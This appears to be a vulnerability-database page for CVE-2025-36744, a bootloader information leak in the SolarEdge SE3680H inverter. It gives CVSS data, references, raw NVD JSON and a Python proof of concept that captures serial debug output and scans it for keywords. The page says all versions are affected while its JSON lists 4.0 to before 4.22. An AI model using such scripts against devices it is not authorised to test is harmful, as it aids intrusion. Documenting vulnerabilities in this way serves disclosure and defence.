CVE-2025-36744

Description

SolarEdge SE3680H has unauthenticated disclosure of sensitive information during the bootloader loop. While the device repeatedly initializes and waits for boot instructions, the bootloader emits diagnostic output this behavior can leak operating system information.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:solaredge:se3680h_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:solaredge:se3680h:-:*:*:*:*:*:*:* - NOT VULNERABLE

SolarEdge SE3680H (所有已知版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-36744 PoC - SolarEdge SE3680H Bootloader Information Disclosure
This PoC demonstrates how to capture sensitive information from the SolarEdge SE3680H bootloader.
Note: Physical access to the device is required.
"""

import serial
import time
import sys

def connect_to_device(port='/dev/ttyUSB0', baudrate=115200):
    """
    Connect to the SolarEdge device via serial debug port.
    Common ports: /dev/ttyUSB0, /dev/ttyUSB1, COM1, COM2
    """
    try:
        ser = serial.Serial(
            port=port,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=10
        )
        return ser
    except serial.SerialException as e:
        print(f"[-] Failed to connect to {port}: {e}")
        return None

def capture_bootloader_output(ser, duration=30):
    """
    Capture bootloader diagnostic output for specified duration.
    The bootloader loop continuously outputs system information.
    """
    print(f"[*] Capturing bootloader output for {duration} seconds...")
    print("[*] Waiting for device initialization...\n")
    
    start_time = time.time()
    output_buffer = []
    
    while time.time() - start_time < duration:
        if ser.in_waiting > 0:
            try:
                data = ser.read(ser.in_waiting)
                decoded_data = data.decode('utf-8', errors='ignore')
                output_buffer.append(decoded_data)
                print(decoded_data, end='')
            except Exception as e:
                print(f"[-] Error reading data: {e}")
        time.sleep(0.1)
    
    return ''.join(output_buffer)

def analyze_captured_data(data):
    """
    Analyze captured data for sensitive information.
    Look for OS details, kernel info, filesystem data, etc.
    """
    sensitive_patterns = {
        'os_version': ['Linux', 'kernel', 'version', 'release'],
        'filesystem': ['ext', 'squashfs', 'ubi', 'jffs2', 'mount'],
        'hardware': ['CPU', 'memory', 'DDR', 'SOC', 'board'],
        'network': ['eth', 'wlan', 'IP', 'MAC', 'dhcp']
    }
    
    findings = {}
    for category, keywords in sensitive_patterns.items():
        matches = []
        for keyword in keywords:
            if keyword.lower() in data.lower():
                matches.append(keyword)
        if matches:
            findings[category] = matches
    
    return findings

def main():
    print("=" * 60)
    print("CVE-2025-36744 PoC - SolarEdge SE3680H")
    print("Information Disclosure via Bootloader Loop")
    print("=" * 60)
    
    port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0'
    
    ser = connect_to_device(port)
    if not ser:
        sys.exit(1)
    
    print(f"[+] Connected to {port}")
    print("[+] Starting bootloader capture...\n")
    
    captured_data = capture_bootloader_output(ser, duration=30)
    
    print("\n" + "=" * 60)
    print("[*] Analyzing captured data...")
    
    findings = analyze_captured_data(captured_data)
    
    print("\n[+] Sensitive Information Found:")
    for category, matches in findings.items():
        print(f"  - {category}: {', '.join(matches)}")
    
    ser.close()
    print("\n[+] Capture complete. Serial connection closed.")

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36744
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36744
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36744/
[4] VulDB https://vuldb.com/cve/CVE-2025-36744
[5] https://csirt.divd.nl/CVE-2025-36744
[6] https://csirt.divd.nl/DIVD-2025-00022/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36744", "sourceIdentifier": "[email protected]", "published": "2025-12-12T15:15:53.050", "lastModified": "2025-12-23T17:20:12.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SolarEdge SE3680H has unauthenticated disclosure of sensitive information during the bootloader loop. While the device repeatedly initializes and waits for boot instructions, the bootloader emits diagnostic output this behavior can leak operating system information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:solaredge:se3680h_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndExcluding": "4.22", "matchCriteriaId": "1525CFCE-58DC-428A-B3A5-FE97E306C581"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:solaredge:se3680h:-:*:*:*:*:*:*:*", "matchCriteriaId": "CF1A53FC-7C47-46A1-8A50-9FDF74A350C7"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36744", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://csirt.divd.nl/DIVD-2025-00022/", "source": "[email protected]", "tags": ["Broken Link"]}]}}